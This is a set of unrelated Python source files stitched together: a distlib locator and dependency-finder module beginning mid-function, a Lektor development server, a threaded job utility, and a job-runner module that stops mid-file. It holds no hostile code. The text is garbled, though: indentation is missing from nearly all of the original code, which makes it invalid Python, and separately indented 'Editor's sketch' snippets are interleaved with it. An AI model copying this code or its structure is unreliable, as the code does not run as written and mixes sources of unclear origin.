result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%02x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
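# Editor's sketch (not in the original): exercising Page on a tiny HTML
# fragment; the markup and URLs are illustrative.
def _example_page_links():  # pragma: no cover
    html = '<a rel="download" href="https://example.com/foo-1.0.tar.gz">foo</a>'
    page = Page(html, 'https://example.com/simple/foo/')
    return page.links  # a reverse-sorted list of (url, rel) tuples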
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O.
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.daemon = True
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does a URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if a URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for a URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched.
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
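# Editor's sketch (not in the original): scanning a local directory of
# archives; the path is illustrative and must exist, otherwise
# DistlibException is raised.
def _example_scan_wheelhouse():  # pragma: no cover
    locator = DirectoryLocator('/tmp/wheelhouse', recursive=False)
    return locator.get_distribution_names()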
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
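# Editor's sketch (not in the original): the module-level convenience alias in
# action; the requirement string is illustrative and this performs network I/O.
def _example_locate():  # pragma: no cover
    dist = locate('requests (>= 2.0)')
    return None if dist is None else dist.name_and_version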
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distributions which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
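# Editor's sketch (not in the original): resolving a requirement together with
# its dependency closure; the requirement string is illustrative.
def _example_find_dependencies():  # pragma: no cover
    dists, problems = DependencyFinder().find('flask (>= 1.0)')
    return sorted(d.name_and_version for d in dists), problems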
|
devserver.py | import os
import time
import traceback
import threading
from werkzeug.serving import run_simple, WSGIRequestHandler
from lektor.db import Database
from lektor.builder import Builder, process_build_flags
from lektor.watcher import Watcher
from lektor.reporter import CliReporter
from lektor.admin import WebAdmin
from lektor.utils import portable_popen
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, verbosity=0, build_flags=None):
threading.Thread.__init__(self)
watcher = Watcher(env, output_path)
watcher.observer.start()
self.env = env
self.watcher = watcher
self.output_path = output_path
self.verbosity = verbosity
self.last_build = time.time()
self.build_flags = build_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(db.new_pad(), self.output_path,
build_flags=self.build_flags)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
for ts, _, _ in self.watcher:
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools(object):
"""This provides extra helpers for launching tools such as webpack."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
from lektor import admin
admin = os.path.dirname(admin.__file__)
portable_popen(['npm', 'install', '.'], cwd=admin).wait()
self.watcher = portable_popen([os.path.join(
admin, 'node_modules/.bin/webpack'), '--watch'],
cwd=os.path.join(admin, 'static'))
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
import webbrowser
def browse():
time.sleep(1)
webbrowser.open('http://%s:%s' % addr)
t = threading.Thread(target=browse)
t.daemon = True
t.start()
def run_server(bindaddr, env, output_path, verbosity=0, lektor_dev=False,
ui_lang='en', browse=False, build_flags=None):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get('WERKZEUG_RUN_MAIN') == 'true'
in_main_process = not lektor_dev or wz_as_main
build_flags = process_build_flags(build_flags)
if in_main_process:
background_builder = BackgroundBuilder(env, output_path, verbosity,
build_flags)
background_builder.daemon = True
background_builder.start()
env.plugin_controller.emit('server-spawn', bindaddr=bindaddr,
build_flags=build_flags)
app = WebAdmin(env, output_path=output_path, verbosity=verbosity,
debug=lektor_dev, ui_lang=ui_lang,
build_flags=build_flags)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(bindaddr[0], bindaddr[1], app,
use_debugger=True, threaded=True,
use_reloader=lektor_dev,
request_handler=not lektor_dev
and SilentWSGIRequestHandler or WSGIRequestHandler)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit('server-stop')
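# Editor's sketch (not part of lektor): how run_server is typically invoked;
# `env` would be a lektor Environment, and the address and output path below
# are illustrative assumptions.
def _example_serve(env):  # pragma: no cover
    run_server(('127.0.0.1', 5000), env, output_path='/tmp/lektor-build',
               verbosity=1, lektor_dev=False, browse=True)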
|
_utils.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Ternaris, Munich, Germany
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, division
import inspect
import json
import re
from Queue import Queue
from itertools import tee
from collections import namedtuple
from threading import Thread
from .globals import _job_ctx_stack
from .model import db, Jobrun
def multiplex(inputs, processors, logger=None, dont_catch=False):
"""tee inputs, feed to each processor and return multiplexed outputs"""
generators = []
zipped = zip(processors, tee(inputs, len(processors)))
for processor, _inputs in zipped:
if dont_catch:
generator = processor(_inputs)
assert inspect.isgenerator(generator)
else:
try:
generator = processor(_inputs)
except:
import traceback
if logger:
logger.error(traceback.format_exc())
else:
traceback.print_exc() # noqa #pragma nocoverage
continue
generators.append(generator)
while generators:
for outputs in generators:
if dont_catch:
try:
yield outputs.next()
except StopIteration:
generators.remove(outputs)
continue
try:
yield outputs.next()
except StopIteration:
generators.remove(outputs)
except:
import traceback
if logger:
logger.error(traceback.format_exc())
else:
traceback.print_exc() # noqa #pragma nocoverage
generators.remove(outputs)
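# Editor's sketch (not in the original): multiplex() tees one input stream into
# several generator-based processors and interleaves their outputs round-robin.
def _example_multiplex():  # pragma: no cover
    def doubler(inputs):
        for x in inputs:
            yield 2 * x
    def squarer(inputs):
        for x in inputs:
            yield x * x
    # for inputs 1, 2, 3 this yields 2, 1, 4, 4, 6, 9
    return list(multiplex([1, 2, 3], [doubler, squarer], dont_catch=True))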
def title_from_name(name):
return re.sub(r'(\A|_)(.)',
lambda m: (m.group(1) and ' ') + m.group(2).upper(), name)
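# Editor's sketch (not in the original): title_from_name turns snake_case
# identifiers into capitalized titles.
def _example_title_from_name():  # pragma: no cover
    assert title_from_name('fileset_id') == 'Fileset Id'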
AsyncJob = namedtuple('AsyncJob', ['thread', 'msg_queue', 'rv_queue',
'name', 'fileset_id', 'version',
'jobrun_id', 'topics'])
class Done(object):
pass
Done = Done()
class Failed(object):
pass
Failed = Failed()
class EffectiveConfig(object):
def __init__(self, cfg):
self.cfg = cfg
def make_async_job(app, name, job, topics, group, version, config, fileset_id):
if config is None:
config = {}
msg_queue = Queue()
rv_queue = Queue()
def messages():
while True:
x = msg_queue.get()
if x is Done:
msg_queue.task_done()
break
yield x
msg_queue.task_done()
def async_job(app, messages, jobrun_id):
with app.app_context():
try:
db.create_all()
cfg, rv_generator = \
job(jobrun_id=jobrun_id, messages=messages(), **config)
rv_queue.put(EffectiveConfig(cfg))
for rv in rv_generator:
rv_queue.put(rv)
except:
import traceback
traceback.print_exc()
rv_queue.put(Failed)
finally:
_job_ctx_stack.pop()
rv_queue.put(Done)
db.session.remove()
jobrun = Jobrun(name=name, version=version, fileset_id=fileset_id)
db.session.add(jobrun)
db.session.commit()
thread = Thread(target=async_job, name=name, args=(app, messages, jobrun.id))
thread.daemon = True
thread.start()
return AsyncJob(thread=thread, msg_queue=msg_queue, topics=topics,
rv_queue=rv_queue, name=name, version=version,
fileset_id=fileset_id, jobrun_id=jobrun.id)
def async_job_milker(app, async_job):
with app.app_context():
db.create_all()
jobrun = Jobrun.query.filter(Jobrun.id == async_job.jobrun_id).first()
try:
while True:
res = async_job.rv_queue.get()
if isinstance(res, EffectiveConfig):
jobrun.config = json.dumps(res.cfg)
continue
if res is Done:
jobrun.succeeded = True
db.session.commit()
break
if res is Failed:
jobrun.failed = True
db.session.commit()
break
instance = res
instance.jobrun = jobrun
db.session.add(instance)
db.session.commit()
except:
import traceback
traceback.print_exc() # noqa #pragma nocoverage
jobrun.failed = True
db.session.commit()
finally:
db.session.remove()
|
job.py | """
**job** module handles all the job running logic:
- consistent exception handling and logging
- currently two job runners are implemented:
- SimpleJobRunner runs the jobs sequentially;
- MultiThreadingJobRunner queues the jobs and runs them in dedicated worker threads.
"""
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from enum import Enum, auto
import logging
import math
import queue
import signal
import threading
import time
from .utils import Namespace, Timer, InterruptTimeout, is_main_thread, raise_in_thread, signal_handler
log = logging.getLogger(__name__)
class State(Enum):
created = auto()
cancelled = auto()
running = auto()
rescheduled = auto()
stopping = auto()
stopped = auto()
class JobError(Exception):
pass
class InvalidStateError(JobError):
pass
class CancelledError(JobError):
pass
class Job:
def __init__(self, name="", timeout_secs=None, priority=None, raise_exceptions=False):
"""
:param name:
:param timeout_secs:
:param priority:
:param raise_exceptions: bool (default=False)
If True, log and raise any Exception that caused a job failure.
If False, only log the exception.
"""
self.name = name
self.timeout = timeout_secs
self.priority = priority
self.state = State.created
self.thread_id = None
self.raise_exceptions = raise_exceptions
def start(self):
try:
start_msg = "Starting job {}.".format(self.name)
self.thread_id = threading.current_thread().ident
if self.state == State.stopping:
self.state = State.cancelled
raise CancelledError("Job was cancelled.")
elif self.state != State.created:
self.state = State.cancelled
raise InvalidStateError("Job can't be started from state `{}`.".format(self.state))
log.info("\n%s\n%s", '-'*len(start_msg), start_msg)
self.state = State.running
self._prepare()
with Timer() as t:
with InterruptTimeout(self.timeout,
interruptions=[
dict(sig=None), # first trying sig=None to avoid propagation of the interruption error: this way we can collect the timeout in the result
dict(sig=signal.SIGINT if is_main_thread() else signal.SIGTERM), # if main thread, try a graceful interruption.
dict(sig=signal.SIGQUIT), # graceful doesn't work, let's talk seriously.
dict(sig=signal.SIGKILL),
],
wait_retry_secs=60 # escalates every minute if the previous interruption was ineffective
):
result = self._run()
log.info("Job %s executed in %.3f seconds.", self.name, t.duration)
log.debug("Job %s returned: %s", self.name, result)
return result, t.duration
except Exception as e:
log.exception("Job `%s` failed with error: %s", self.name, str(e))
if self.raise_exceptions:
raise
return None, -1
def stop(self):
try:
self.state = State.stopping
self._stop()
return 0
except Exception as e:
log.exception("Job `%s` did not stop gracefully: %s", self.name, str(e))
return 1
def done(self):
try:
if self.state in [State.rescheduled, State.running, State.stopping]:
self._on_done()
except Exception as e:
log.exception("Job `%s` completion failed with error: %s", self.name, str(e))
finally:
if self.state is State.rescheduled:
self.reset()
else:
self.reset(State.stopped)
def reschedule(self):
self.state = State.rescheduled
self.thread_id = None
def reset(self, state=State.created):
self.state = state
self.thread_id = None
def _prepare(self):
"""hood to execute pre-run logic: this is executed in the same thread as the run logic."""
pass
def _run(self):
"""jobs should implement their run logic in this method."""
pass
def _stop(self):
if self.thread_id is not None:
raise_in_thread(self.thread_id, CancelledError)
def _on_done(self):
"""hook to execute logic after job completion in a thread-safe way as this is executed in the main thread."""
pass
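# Editor's sketch (not part of the original module): a minimal Job subclass;
# the sleep duration and the returned value are illustrative.
class _ExampleSleepJob(Job):  # pragma: no cover
    def _run(self):
        time.sleep(0.1)
        return self.name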
class JobRunner:
def __init__(self, jobs):
self.jobs = jobs
self.results = []
self.state = State.created
self._queue = None
self._last_priority = 0
def start(self):
if self.state != State.created:
raise InvalidStateError(self.state)
self._init_queue()
self.state = State.running
with Timer() as t:
self._run()
self.state = State.stopped
log.info("All jobs executed in %.3f seconds.", t.duration)
return self.results
def stop(self):
self.state = State.stopping
self._queue.put((-1, None))
return self._stop()
def stop_if_complete(self):
if 0 < len(self.jobs) == len(self.results):
self.stop()
def put(self, job, priority=None):
if priority is None:
if job.priority is None:
job.priority = self._last_priority = self._last_priority+1
else:
job.priority = priority
self._queue.put((job.priority, job))
def _init_queue(self):
self._queue = queue.PriorityQueue(maxsize=len(self.jobs))
for job in self.jobs:
self.put(job)
def __iter__(self):
return self
def __next__(self):
if self._queue is None:
return
_, job = self._queue.get()
self._queue.task_done()
if job is None:
self._queue = None
return
return job
def _run(self):
pass
def _stop(self):
for job in self.jobs:
job.stop()
class SimpleJobRunner(JobRunner):
def _run(self):
for job in self:
if self.state == State.stopping:
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
job.done()
self.stop_if_complete()
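# Editor's sketch (not in the original): running jobs sequentially; builds on
# the _ExampleSleepJob sketch above and returns a list of result Namespaces.
def _example_run_sequentially():  # pragma: no cover
    jobs = [_ExampleSleepJob(name="job%d" % i) for i in range(3)]
    return SimpleJobRunner(jobs).start()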
